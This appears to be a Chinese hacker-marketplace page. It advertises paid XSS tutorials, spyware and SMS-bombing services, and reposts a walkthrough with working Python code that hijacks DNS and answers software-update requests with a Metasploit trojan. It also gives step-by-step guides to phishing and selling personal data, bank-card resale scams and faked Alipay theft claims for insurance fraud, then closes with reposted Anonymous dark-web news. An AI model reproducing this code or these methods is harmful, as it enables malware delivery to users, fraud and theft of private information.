中国骇客云平台XSS漏洞攻击教程(下载付费)

中国骇客云平台已经开放了在线的骇客专业版付费教程项目,目前包括软件类,教程类,以及最新0day漏洞的资源..
大家需要购买请点击支付【使用支付宝  或者微信  】使用扫码支付!
就可以看到我们的xss漏洞教程了..有想学习的朋友可以参考官网的教程!绝对精品,仅此一家!

隐藏内容: ********, 支付¥58.00下载

中国骇客云平台官网产品有需要请联系我们的广告客服!

短信轰炸延迟 云胡渣!

棋牌透视辅助!!

短信轰炸

中国骇客云平台官网因部分的国内业务调整有需求请联系下我们的客服!!!感谢大家的支持噢 ~~~~
更多软件后续视频发..因为有些不能平台发..请大家添加客服即可!感谢老客户以及大家一致以来的支持!
平台官网:www.anonymouoschina.org  www.anonymouschina.com www.hackerschina.org

微信定位刷粉

查kf

手机即使监控  间谍程序

呼死你轰炸接听..麻仁

定位装B神奇

 

资金转账无功能有显示装B神奇

胡思你轰炸!!!!
更多软件:手机改号   菠菜开奖平台  菠菜开奖劫持开奖号篡改等!

中国骇客云平台官方网站推荐之黑客工具XSS漏洞视频

中国骇客云平台推荐两个教程链接,有需要的小伙伴可以自行下载:

Kali Linux By 颖奇L’Amore系列教程 2015

链接:https://pan.baidu.com/s/1KkTv1IBZH1EFYaxnmAoy1g 密码:5bya

【2017顶尖黑客教程】

解压密码为:foshanxinxin

各位小伙伴自行复制链接去下载吧^_^

顺便再多发一个XSS漏洞的视频

xss漏洞攻击
链接: https://pan.baidu.com/s/1VUAjAEl1qpiXf1wrc-5atg 密码: 4qa9

更多关注平台网站:www.anonymouschina.org www.anonymouschina.com www.hackerschina.org国际版

中国骇客云平台教您劫持DNS通过流量植入木马实验

 

更多可以关注我们官网:因为国内老域名已经被屏蔽现在国内域名可以正常访问:www.anonymouschina.org  www.anonymouschina.com
国际站或者国外服务器可以正常访问:www.hackerschina.org
前言

很多时候对目标进行渗透时一般会从web、网络设备、针对性钓鱼这三个方向入手。假设我们控制了目标网络中的一台网络设备,如路由器,内网用户流量会从这个地方经过我们怎么获取其权限呢 ?

这种时候可以在路由器上抓包分析用户流量,比如启动xshell、notepad++等软件时发送的更新请求包,然后我们替换软件更新的http响应包达到植入木马目的。

分析流量一般用tcpdump,如果只有路由器后台权限没有地方可以执行命令的话可以用DNS服务器配合HTTP代理来截获流量。

这里就演示一下去劫持软件更新服务器达到植入木马的目的

一、部署DNS服务器

为了方便演示这里将受害者机器上的DNS改为攻击者IP

下载sqlmap项目提取sqlmap\sqlmap-stable\lib\request目录中的dns.py

执行看看效果

在用户机器上ping了一下,DNS服务器这边已经成功接收域名解析请求并响应127.0.0.1

但是这个脚本中把所有域名解析请求都响应成127.0.0.1

需要修改一下

我们的需求是能够正常解析域名,再对某些指定域名进行劫持。

修改后代码如下

#!/usr/bin/env python"""Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)See the file 'doc/COPYING' for copying permission"""import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):    """    Used for making fake DNS resolution responses based on received    raw request    Reference(s):http://code.activestate.com/recipes/491264-mini-fake-dns-server/https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py    """    def __init__(self, raw):        self._raw = raw        self._query = ""        type_ = (ord(raw[2]) >> 3) & 15                 # Opcode bits        if type_ == 0:                                  # Standard query            i = 12            j = ord(raw[i])            while j != 0:                self._query += raw[i + 1:i + j + 1] + '.'                i = i + j + 1                j = ord(raw[i])    def response(self, resolution):        """        Crafts raw DNS resolution response packet        """        retVal = ""        if self._query:            retVal += self._raw[:2]                                             # Transaction ID            retVal += "\x85\x80"                                                # Flags (Standard query response, No error)            retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00"      # Questions and Answers Counts            retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)]      # Original Domain Name Query            retVal += "\xc0\x0c"                                                # Pointer to domain name            retVal += "\x00\x01"                                                # Type A            retVal += "\x00\x01"                                                # Class IN            retVal += "\x00\x00\x00\x20"                                        # TTL (32 seconds)            retVal += "\x00\x04"                                                # Data length            retVal += "".join(chr(int(_)) for _ in resolution.split('.'))       # 4 bytes of IP        return retValclass DNSServer(object):    def __init__(self):        self.my_resolver = dns.resolver.Resolver()        self.my_resolver.nameservers = ['8.8.8.8']        self._check_localhost()        self._requests = []        self._lock = threading.Lock()        try:            self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)        except AttributeError:            self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)        self._socket.bind(("", 53))        self._running = False        self._initialized = False    def _check_localhost(self):        response = ""        try:            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)            s.connect(("", 53))            s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex"))  # A www.google.com            response = s.recv(512)        except:            pass        finally:            if response and "google" in response:                raise socket.error("another DNS service already running on *:53")    def pop(self, prefix=None, suffix=None):        """        Returns received DNS resolution request (if any) that has given        prefix/suffix combination (e.g. prefix.<query result>.suffix.domain)        """        retVal = None        with self._lock:            for _ in self._requests:                if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):                    retVal = _                    self._requests.remove(_)                    break        return retVal    def get_domain_A(self,domain):        try:            results=self.my_resolver.query(domain,'A')            for i in results.response.answer:                for j in i.items:                    try:                        ip_address = j.address                        if re.match('\d+\.+\d+\.+\d+\.+\d', ip_address):                            return ip_address                    except AttributeError as e:                        continue        except Exception as e:            return '127.0.0.1'                def run(self):        """        Runs a DNSServer instance as a daemon thread (killed by program exit)        """        def _():            try:                self._running = True                self._initialized = True                while True:                    data, addr = self._socket.recvfrom(1024)                    _ = DNSQuery(data)                    domain=_._query[:-1] ###### exploit                    ip=self.get_domain_A(domain)                    if domain=='cdn.netsarang.net':                        ip='192.168.80.142'                    print domain,' -> ',ip                    self._socket.sendto(_.response(ip), addr)                    with self._lock:                        self._requests.append(_._query)            except KeyboardInterrupt:                raise            finally:                self._running = False        thread = threading.Thread(target=_)        thread.daemon = True        thread.start()if __name__ == "__main__":    server = None    try:        server = DNSServer()        server.run()        while not server._initialized:            time.sleep(0.1)        while server._running:            while True:                _ = server.pop()                if _ is None:                    break                else:                    domian=_[:-1]                    #print "[i] %s with A %s" % (domian,server.get_domain_A(domian))            time.sleep(1)    except socket.error, ex:        if 'Permission' in str(ex):            print "[x] Please run with sudo/Administrator privileges"        else:            raise    except KeyboardInterrupt:        os._exit(0)    finally:        if server:            server._running = False

这个脚本的功能是将用户的DNS请求转发给GOOGLE的DNS服务器使用户能够正常上网,然后再对指定域名做劫持

可以看到现在用户已经可以正常上网了

然后部署HTTP代理服务器

代码我已经写好了

# -*- coding: UTF-8 -*-import socketimport threading, getopt, sys, stringimport re#设置默认的最大连接数和端口号list=50port=80file_contents=open('myrat.exe','rb').read()def req_server():    return 'HTTP/1.1 200 OK\r\nContent-Length: 303641\r\nContent-Type: application/force-download\r\nLast-Modified: Fri, 10 Jan 2014 03:54:35 GMT\r\nAccept-Ranges: bytes\r\nETag: "80f5adb7dcf1:474"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nDate: Thu, 24 May 2018 06:25:45 GMT\r\nConnection: close\r\n\r\n'+file_contents    def jonnyS(client, address):    try:    #设置超时时间        client.settimeout(500)    #接收数据的大小        buf = client.recv(2048)        print buf    #将接收到的信息原样的返回到客户端中        client.send(req_server())    #超时后显示退出    except socket.timeout:        print 'time out'    #关闭与客户端的连接    client.close()def main():    #创建socket对象。调用socket构造函数    #AF_INET为ip地址族,SOCK_STREAM为流套接字    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    #将socket绑定到指定地址,第一个参数为ip地址,第二个参数为端口号    sock.bind(('0.0.0.0', port))    #设置最多连接数量    sock.listen(list)    while True:    #服务器套接字通过socket的accept方法等待客户请求一个连接        client, address = sock.accept()        thread = threading.Thread(target=jonnyS, args=(client, address))        thread.start()if __name__ == '__main__':    main()

这里的功能是收到用户的HTTP请求后直接响应一个二进制文件,也就是我们的木马

效果如下

很多软件更新时都走的https所以我们还需搭建https代理服务器

搭建HTTPS代理服务器

代码如下

import socketserver, ssl, timeclass MyHTTPSHandler_socket(socketserver.BaseRequestHandler):    def handle(self):        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)        context.load_cert_chain(certfile="cert.pem")        SSLSocket = context.wrap_socket(self.request, server_side=True)        self.data = SSLSocket.recv(1024)        print(self.data)        file_contents=open('myrat.exe','rb').read()        buf = 'HTTP/1.1 200 OK\r\nContent-Length: 303641\r\nContent-Type: application/force-download\r\nLast-Modified: Fri, 10 Jan 2014 03:54:35 GMT\r\nAccept-Ranges: bytes\r\nETag: "80f5adb7dcf1:474"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nDate: Thu, 24 May 2018 06:25:45 GMT\r\nConnection: close\r\n\r\n'+file_contents        SSLSocket.send(buf)if __name__ == "__main__":    port = 443    httpd = socketserver.TCPServer(('0.0.0.0', port), MyHTTPSHandler_socket)    httpd.serve_forever()

执行openssl req -new -x509 -keyout https_svr_key.pem -out https_svr_key.pem -days 3650 -nodes  可以生成证书

搭建好后配置木马,这里就用msf做演示

msfvenom -p windows/ -f exe -o myrat.exe

然后看一下xshell的更新请求

域名是cdn.netsarang.net,看一下流量

可以看到是走的https

在dns服务器中添加如下

架设https服务器

运行脚本和msf监听

视频效果图

总结

1.可以针对firefox等自动更新或后台静默更新的这类应用程序进行流量替换,这样成功率会很高被发现可能性也小

2.当更新包请求是https时需要注意证书问题,可以尝试利用cname绕过,比如在dns服务器上把www.baidu.com重定向到www.exploit.com,我们有www.exploit.com的合法证书这样就不会报错.

3.在路由器上修改DNS也可以作为一种持久性控制的手段,某天权限不慎丢失了,继续植入就行了。

*本文原创作者:R1ngk3y,本文属FreeBuf原创奖励计划,未经许可禁止转载

黑产之数据交易,钓鱼用户信息解密!(更多关于灰色产业请关注我们的网站hackerschina.org)

尊敬的用户每周我们更新一期黑产的解密,这些教程也是为了让更多的人关注网络,关注网络安全,关注自己的隐私信息不被泄漏!
但中国是个网络信息泄漏大国!数据安全从我们自身做起!
教程开始:
首先一些“商家”利用用户拼团进行钓鱼。
比如一件衣服300元,a用户拼团进行推荐用户,b用户,c用户进行拼团,细胞分列式….拼团成功。a用户可以0元得到一件商品。b,c,用户的信息已经泄漏给商家。另外b.c用户也进行拼团,其他所有用户数据信息泄漏都会受到波及!商家可收集这些用户的信息。
把这些信息卖给 黑客!当然….这些数据绝对比300元的商品多的多..你们会了吗?
以上介绍了商家进行钓鱼。
我们介绍一下自己搭建平台进行钓鱼,做一些问卷类型的调查报告!有趣的!再后头就可以截获到用户的信息。
手机局域网的中间人攻击也可以实现对目标用户信息窃取!
还有一种方法!扫描二维码.白送杯子啊…充电宝啊..用户上当受骗的肯定多的多!
另外公众微信平台也可以通过某些小程序对所有用户进行信息窃取。
包括app在获取用户时,可对用户通讯录进行权限获取…万能钥匙就是很好的例子~~可以百度以下咯…(关于万能钥匙不做过多解释,百度一大堆…具体情况本人也不知道…想了解更多用户信息窃取..百度一下吧..方法多的是!!)
最主要的一步来了、。。。
找到收数据的人..这些数据可以卖到..多少钱..是个惊天价格!
另外公司内部员工…弟弟外卖..以及其他也是数据信息泄漏的途径..
这些get 你们知道了吗?
以后自己的信息还安全吗……~~~~~

灰色产业之银行卡转卖以及限制额度交易变现(黑产吃黑产揭秘)因为好多人觉得灰产很赚钱!解密一下!

灰色产业链对于目前得中国市场存在很严重得漏洞缺陷和法律缺陷!那么好多人放弃了工作走向了灰色产业!这里讲一下那些黑产吃黑产得故事!
倒卖全套银行卡以及黑吃黑得案例说明:
具体得截图就不做了大家可以按照说明去做!
首先百度搜索引擎搜索:(哪里可以买到银行卡)等关键字
|或者QQ群搜索:银行卡信息  买银行卡等
接下来就是交易了:
首先找到这些能够交易得人!

卖卡人   开通资金归集功能  或者 二级账户进行最后得 资金套现,具体说明如下(第三人称)

教程开始

卖卡的“高手”,几乎都是采用你能够接受的手段成交,例如邮寄到付或淘宝交易等。一整套的卡资料,包含银行卡卡片、U遁、电话卡、开户资料、开户绑定的手机卡等,有的还配备一个老人手机,资料的完整度没有任何的瑕疵,而且价格也低到你感到兴奋。

也许你会认为,这些卖卡的人,纯粹是为了卖卡赚钱,如果是那样想,你就错了。

因为他们卖卡给你,是先给你下个诱饵,然后套你一笔更大的。这有点应了那句“免费才是最贵”的话的感觉。

其实,这些人卖卡给你,可以做到双重收益,一种是直接卖给你,赚了你买卡的钱;一种是后期套你卡上的钱,让你白白为他打工。

第一种赚钱模式,就不多说,就是买卖关系。这里,重点讲述下第二种赚钱模式,就是如何套你卡上的钱。

因为大部分人买这些卡,都是用来洗钱或者做不见光项目。于是,这些卖卡给你的人,就通过资金归集的手段,将你的辛苦赚来的昧良心的钱给转移到他提前设定的账户。

所谓的“资金归集”黑你账户,就是开通“归集功能”或“二级账户”,通过设置你金额的限制,当你的金额达到设置的额度后,账户的资金就会自动转移到另外一个设定的账户,而且这个金额是可以随意设置。

更可恨的是,对方还可以设置你的提现和转账额度。他们的玩法,就是将你的账户额度设置得比较高,而转账和提现额度就特别低。所以,这个钱基本你就提现不了。因为他拥有一级账户权限,可以将二级账户的钱转走。

觉得不错 请支持我们!后续更新..黑产得那些事情!!想赚钱?还不看过来?大揭秘!

灰产之色情网站,微信平台,QQ平台等直播平台进行擦边网赚!(揭秘)

关于色情网站,有时候不仅仅是自己的资源,只要做到引流就可以进行网赚!
教程揭秘开始:
自己做一个html页面或者直接架设一个网站,资源做嵌入式开发即可!(直接套用其他网站的资源..也可以自己买)一个网盘60块钱  10000部或者更多!
微信群,QQ群则成了交易平台:农民工啊..学生啊..这些群体很容易的!(犯法的事情咱们不干!揭秘)
…..广告业务真心可以赚钱!,但是网络就应该是绿色的!本篇文本身还有后续!但是..不想再发了!….这只是其中之一…..网络毒瘤!请大家远离!
因为近期打掉了很多app以及网站!所以…网络环境需要你我他共同维护!
不过有人就有网赚,如果你有1000个人…随便扔出多少就有收货多少!
我们仅仅是为了揭秘!我们只是告诫大家远离黄赌毒!….网络需要绿色的!感谢大家一直以来的支持!

从今天开始每周发一篇关于灰产项目的网赚!日撸上万元!(灰产之支付宝骗保揭秘)

关于灰产.有的人第一想法就是很赚钱!但是你们会不会呢?这里骇客云每周期揭露灰色网赚项目!你们可以学但是不可以违法!可以网赚但是不准自己去做!
有的人通过支付宝的理赔漏洞进行骗保..但是有时候确实可以得手,但是,万一呢?
那如何才能更为安全的进行网赚呢?….
这里就是让大家去卖这个zfb的pian保教程!
如果卖给一个人是200元
两个人就是400元
10个人就是2000元
100个人就是20000元!那么如果你一天能卖10个人一个月下来可想而知了!
好了揭秘开始:
整个项目操作就是利用支付宝被盗进行理赔的一个逻辑性思维漏洞进行骗保!
如果自己伪造支付宝被盗假象,那么支付宝可以无条件进行理赔!
那如何做到支付宝被盗假象呢?
IP地址在伪装最基础胡,可以临时使用服务器,本地登录后,服务器登录IP地址会有变更!一般人都知道吧?第二就是利用服务器或者跳板进行盗刷支付宝(这个操作可以朋友操作,也可以自己匀做)第三就是需要等待支付宝胡异地登录警告,直接自己赶紧登录…然后查余额等操作…接下来就要申请理赔了…然后呢..你需要去编故事!但是这个需要进行一个很好的证据链..做好保证万无一失(低额度99% )
过程肯证据链胡说明方法..自己去想很简单..超市…虚拟货币等都可以进行交易!
每周网赚灰产揭秘…下期给大家再做!如果想网赚关注本站www.hackerschina.org

Anonymous Launches OnionIRC, Specifically for “Training the Next Generation of Hackers”

Anonymous members on the deep web have launched a new chat service specifically “to teach the next generation of hacktivists.” What sets this chat apart from others is that unlike AnonOps IRC, the chat will not be used to plan or conduct missions. Unlike services offered by AnonHQ, 4Chan or Reddit, it will not be used for general conversation and information sharing.

As stated in the video below, in response to the efforts of government around the world to censor the movement, the chat hopes “to arm the current generation of internet activists with education.” Their plan is to provide virtual classrooms where teachers can give instruction on a variety or subjects including security culture; hacking & technical tutorials; history; and how to properly utilize encryption & anonymity software.

 

How To Access OnionIRC

A step-by-step tutorial on how to connect to the OnionIRC using your Tor Browser and the HexChat IRC client can be found below:

Step 1:DownloadTor BrowserandHexChat. You can download them from Softpedia mirrors, or from their homepages.

Step 2:Open HexChat and clickADD. A screenshot of the appropriate settings is available below.

HexChat login settings

In theLogin Methodsection, you can leave those fields blank for the first visit. After you connect to the IRC for the first time, make sure to register an identity.

The rest of the information you need to keep in mind, is the OnionIRC URL and port, which are:onionirchubx5363.onion/6667

Step 3:Open the Tor Browser, and keep it open for the time you are on the OnionIRC. In HexChat’sSettingsoption, go toNetwork, and then toNetwork Setup.

Here you’ll set up a proxy server with the details from the image below. Keep in mind that, every time you close the Tor Browser, these settings will be wiped, and you’ll have to apply them all over again. That’s it, you’re done. Connect to the OnionIRC.

HexChat proxy settings

You can follow the movements, find new class schedules and download content previously covered on the Anonymous OnionIRC Twitter page:https://twitter.com/onionirc

How Else To Reach Anonymous

AnonBoardsConnected with AnonHQ.Open web chat and online forums:www.anonboards.com

AnonOps IRCHot action and adventure. Home to#AntiSec,#LulzSec:https://newblood.anonops.com/|https://anonops.com/|https://webchat.anonops.com/

AnonNet IRCThe father of anon IRC’s. For lulz, fun, chat, tech:http://site.anonnet.org/

CyberGorilla IRCOnly accepts TOR connections. Small and secure community:https://cyberguerrilla.info/irc-client-setup/

4Chan Random Board:http://boards.4chan.org/b/

Reddit Anonymous Board:https://www.reddit.com/r/anonymous/

Reddit WTF Board:https://www.reddit.com/r/WTF/

Anonymous Just Took Down 1/5 Of Dark Web’s Child Pornography(暗网访问以及连接地址都有可以翻译去直接疯狂一下吧!)

Anonymous

The Dark Web is the encrypted network that exists between Tor servers and their clients aka cyber criminals, activists and many others who want encrypted communications. The Tor Network, the only network that protects the user’s identity and does not watch their Internet activities, helps Internet users retain their privacy online — especially when they are being watched by third parties.

Since most of the Dark Web is a haven for drug markets, pedophiles and sex traffickers who use Tor or set up anonymous .onion websites to hide their location and to ply their illegal trade, it becomes difficult for law enforcement to unmask the criminals seeking refuge in the shadows.

In their attempt to uncover the creators, possessors, and subscribers of child pornography,a group of anonymous hackers breached Freedom Hosting II —the largest host of Dark Web sites accessible only through Tor — downloaded gigabytes of data, and took down and defaced some 10,613 .onion websites.

The anonymous hacktivists claimed over 50% of the data stored on the Freedom Hosting II servers contained child pornography.International Business Timesreported that thehackers stole 75 GB worth of files and 2.6 GB of databases, which they offered to return for 0.1 bitcoin, around $100.

torAccording to Sarah Jamie Lewis, an independent anonymity & privacy researcher who spotted the mass hack as part of her regular scans of the Onion space (Dark Web sites running on the Tor network), Freedom Hosting II was hosting an estimated 15% to 20% of all websites on the Dark Web.

This means that the hack took down nearly a fifth of the Dark Web. Lewis toldThe Verge: “This is a major blow considering many were personal or political blogs and forums. In the short term,a lot of diversity has disappearedfrom the Dark Web.”

Security researcher Chris Monteiro claimed the Freedom Hosting II hack may have disrupted a substantial number of botnets, which are increasingly used by cyber criminals to launch large-scale DDoS attacks.

Monteiro also discovered the .onion websites were not only hosting botnets, but also fraud sites, sites peddling hacked data, weird fetish portals, and child abuse sites targeting both English and Russian speaking buyers. Websites defaced inthe Freedom Hosting II hackinclude:

 

In an interview withVICE, the hackers explainedwhy and howthey took down the Dark Web hosting provider:

“Initially we didn’t want to take down FHII. But thenwe found several large child pornography siteswhich were using more than Freedom Hosting II’s stated allowance. Usually, Freedom Hosting II has a quota of 256MB per site, but these illegal sites comprised of gigabytes of material. This suggests they paid for hosting and the admin knew of those sites. That’s when I decided to take it down instead.”

torIn 2011 also, as part of Operation Darknet,anonymous hacked and DDoSed the first Freedom Hostingfor hosting child pornography websites. In 2013, when the first Freedom Hosting was hosting half of all Dark Web sites, the FBI used a misconfiguration in the Tor Browser setup to identify visitors to such websites, took down the service, and arrested its owner Eric Eoin Marques in Ireland. Charges laid against Marques were of facilitating the distribution of online child pornography.